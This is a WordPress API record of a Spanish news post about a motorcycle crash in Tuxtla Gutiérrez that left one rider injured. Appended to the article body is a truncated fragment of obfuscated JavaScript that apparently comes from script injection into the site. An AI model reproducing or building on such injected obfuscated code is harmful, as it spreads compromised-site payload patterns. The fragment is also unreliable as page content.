{"id":4207,"date":"2022-08-08T03:28:16","date_gmt":"2022-08-08T03:28:16","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4207"},"modified":"2022-08-08T03:28:17","modified_gmt":"2022-08-08T03:28:17","slug":"choque-entre-motos-deja-un-herido","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4207","title":{"rendered":"Choque entre motos deja un herido"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220807-WA0033-1024x577.jpg\" alt=\"\" class=\"wp-image-4208\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220807-WA0033-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220807-WA0033-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220807-WA0033-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220807-WA0033.jpg 1156w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 7 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un lesionado fue el saldo de un choque entre dos motocicletas ocurrido este domingo en la Calle Central, y 13 Norte de Tuxtla.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, cerca de las 17:30 horas en el punto indicado localizaron a un lesionado.<\/p>\n\n\n\n<p>El conductor de unos 35 a\u00f1os de edad, relat\u00f3 que conduc\u00eda en el sentido de Sur a Norte, y otra moto se le atraves\u00f3 y se estrellaron.<\/p>\n\n\n\n<p>El testimonio inform\u00f3 que, en el lugar del choque llegaron a un acuerdo para la reparaci\u00f3n del da\u00f1o y el presunto responsable se retir\u00f3 a un domicilio cercano.<\/p>\n\n\n\n<p>El sujeto finalmente se retir\u00f3 del lugar abordo de su unidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 7 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un lesionado fue el saldo de un choque entre dos motocicletas ocurrido este domingo en la Calle Central, y 13 Norte de Tuxtla. Los reportes oficiales informaron que, cerca de las 17:30 horas en el punto indicado localizaron a un lesionado. El conductor &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4208,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-4207","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4207","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4207"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4207\/revisions"}],"predecessor-version":[{"id":4209,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4207\/revisions\/4209"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4208"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4207"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4207"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4207"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}